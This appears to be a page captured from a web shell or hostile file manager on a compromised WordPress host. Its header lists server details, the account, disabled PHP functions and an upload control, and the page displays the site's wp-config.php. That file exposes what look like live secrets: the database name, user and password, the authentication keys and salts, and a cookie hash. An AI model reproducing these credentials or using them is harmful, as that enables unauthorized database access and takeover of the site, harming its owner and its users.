HEX
Server: LiteSpeed
System: Linux sg-nme-web1858.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
User: u783955628 (783955628)
PHP: 8.2.30
Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Upload Files
File: /home/u783955628/domains/vietbaocaothue24h.com/public_html/wp-config.php
<?php
define( 'WP_CACHE', true ); // Added by WP Rocket


/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * Localized language
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'u783955628_I1xYI' );

/** Database username */
define( 'DB_USER', 'u783955628_QRRvo' );

/** Database password */
define( 'DB_PASSWORD', '9LDuHVJ2kW' );

/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',          '+b&e[RO^tA|}|y$5D=c|4Fj7jl/#yVcJY9_hh&]lyrdnaIr1Ba4k@RI BDSF9^;%' );
define( 'SECURE_AUTH_KEY',   '}+Ci&^ QB,-vE2>[@. C+jN.yH$ZyNUT>R-;,c3][Hx;U HH%|q&aV2OL QI9vAB' );
define( 'LOGGED_IN_KEY',     ')i%HndY7uNrD0~E wtwaSS/C2?nfD$<{w;7g:^y)>Zf-:0g5DV.X~66d?Ia`wl(2' );
define( 'NONCE_KEY',         '7)l>5/RJ*]KlM/&:d%H Aiqact{{K;SvDz}zG++E,?8YW>mA FPuoS)oujer&3)*' );
define( 'AUTH_SALT',         'zL -~x0,}woXUm3hC9XE0tRL#!h23L>hTo~,RoHQk@.ejJVN$UB;lt:=YYJ`un79' );
define( 'SECURE_AUTH_SALT',  '#-XJB}nHCkWN41F#G_jjv;fPChRJY_{C}WG<ZE@[5HbLI03.n@6)~#Q]w:/ h9y|' );
define( 'LOGGED_IN_SALT',    'T.ygk@IJdy1eA~.@#WGSx|u0b/tN-6)6oL;lh]eZWqWoITPaRelz>>6[4RMRqmSg' );
define( 'NONCE_SALT',        'lXexS?m)! ?v<*y1NMC%G51N)e}Fm=K+)Qw11y!J*ku,SKH1Gg&[QgF-3$dc_Vna' );
define( 'WP_CACHE_KEY_SALT', '{`bjR-B,ny$$-t2#>x-zRbz38hL$~gF[ 2UUug xMT tIC`!hD]^4;C~e@<u<EYB' );
define('WP_MEMORY_LIMIT', '256M');

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';


/* Add any custom values between this line and the "stop editing" line. */



/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
if ( ! defined( 'WP_DEBUG' ) ) {
	define( 'WP_DEBUG', false );
}

define( 'FS_METHOD', 'direct' );
define( 'COOKIEHASH', 'a7519a66e5b0ab13f8db8daee4c0156d' );
define( 'WP_AUTO_UPDATE_CORE', false );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';